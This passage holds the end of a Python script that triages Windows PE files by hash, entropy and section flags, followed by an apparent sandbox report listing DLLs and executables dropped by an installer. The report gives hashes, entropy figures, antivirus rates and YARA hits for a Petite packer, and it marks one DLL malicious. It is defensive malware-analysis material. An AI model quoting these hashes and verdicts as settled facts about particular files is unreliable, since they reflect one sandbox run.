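    (b".text", b"", 0xE0000020),
    (b"", _payload, 0xC0000040),
    (b".petite", b"\x55\x8b\xecERROR!\nCorrupt Data!" + bytes(range(64)), 0x60000020),
])

if __name__ == "__main__":
    r = triage(SAMPLE_PE)
    print("SHA-256:", r["sha256"], "size:", r["size"], "entropy:", r["entropy"])
    for s in r["sections"]:
        print("  %-10r raw=%#07x virt=%#07x entropy=%.3f" % (s["name"], s["raw_size"], s["virtual_size"], s["entropy"]))
    for f in r["findings"]:
        print("  !", f)
```

Replace `SAMPLE_PE` with the bytes of a dropped file to get the same hash and entropy figures the report lists, plus a per-section breakdown; a 0% AV detection rate next to a nameless or RWX section, or a `.petite`-style stub, is the combination worth a manual unpack rather than a pass.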
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68042
                                                                                  Entropy (8bit):6.090396152400884
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                  MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                  SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                  SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                  SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):26526
                                                                                  Entropy (8bit):4.600837395607617
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                  MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                  SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                  SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                  SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                  Malicious:false
                                                                                  Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):17472
                                                                                  Entropy (8bit):7.524548435291935
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                  MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                  SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                  SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                  SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):315918
                                                                                  Entropy (8bit):6.5736483262229735
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                                  MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                                  SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                                  SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                                  SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68876
                                                                                  Entropy (8bit):7.922125376804506
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                  MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                  SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                  SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                  SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):115712
                                                                                  Entropy (8bit):6.401537154757194
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                  MD5:840D631DA54C308B23590AD6366EBA77
                                                                                  SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                  SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                  SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):337408
                                                                                  Entropy (8bit):6.515131904432587
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                  MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                  SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                  SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                  SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Unicode text, UTF-8 text
                                                                                  Category:dropped
                                                                                  Size (bytes):1059
                                                                                  Entropy (8bit):5.1208137218866945
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                  MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                  SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                  SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                  SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                  Malicious:false
                                                                                  Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):31936
                                                                                  Entropy (8bit):6.6461204214578
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                  MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                  SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                  SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                  SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):772608
                                                                                  Entropy (8bit):6.546391052615969
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                  MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                  SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                  SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                  SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):562190
                                                                                  Entropy (8bit):6.388293171196564
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                                  MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                                  SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                                  SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                                  SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):214016
                                                                                  Entropy (8bit):6.676457645865373
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                  MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                  SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                  SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                  SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):852754
                                                                                  Entropy (8bit):6.503318968423685
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                                  MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                                  SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                                  SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                                  SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):149845
                                                                                  Entropy (8bit):7.893881970959476
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                                  MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                                  SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                                  SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                                  SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):34392
                                                                                  Entropy (8bit):7.81689943223162
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                                  MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                                  SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                                  SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                                  SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):967168
                                                                                  Entropy (8bit):6.500850562754145
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                  MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                  SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                  SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                  SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197646
                                                                                  Entropy (8bit):6.1570532273946625
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                  MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                  SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                  SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                  SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):126478
                                                                                  Entropy (8bit):6.268811819718352
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                  MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                  SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                  SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                  SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):394752
                                                                                  Entropy (8bit):6.662070316214798
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                  MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                  SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                  SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                  SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):240654
                                                                                  Entropy (8bit):6.518503846592995
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                  MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                  SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                  SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                  SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):7910
                                                                                  Entropy (8bit):6.931925007191986
                                                                                  Encrypted:false
